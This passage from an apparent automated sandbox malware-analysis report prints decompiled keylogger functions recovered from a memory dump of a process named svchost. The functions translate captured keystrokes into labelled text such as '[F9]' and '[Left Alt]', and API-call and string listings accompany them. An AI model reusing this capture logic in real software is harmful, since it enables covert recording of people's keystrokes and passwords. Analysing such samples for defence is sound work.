					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Num Lock], xrefs: 00C85D26
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85B04, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B04(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F15]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F15], xrefs: 00C85B06
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85B6A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B6A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F20]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F20], xrefs: 00C85B6C

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8598E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8598E(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Reset]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Reset], xrefs: 00C85990

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85BF2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BF2(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F6]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F6], xrefs: 00C85BF4

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85CAD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CAD(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Left Alt]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Left Alt], xrefs: 00C85CAF

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85C25, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C25(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F9]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
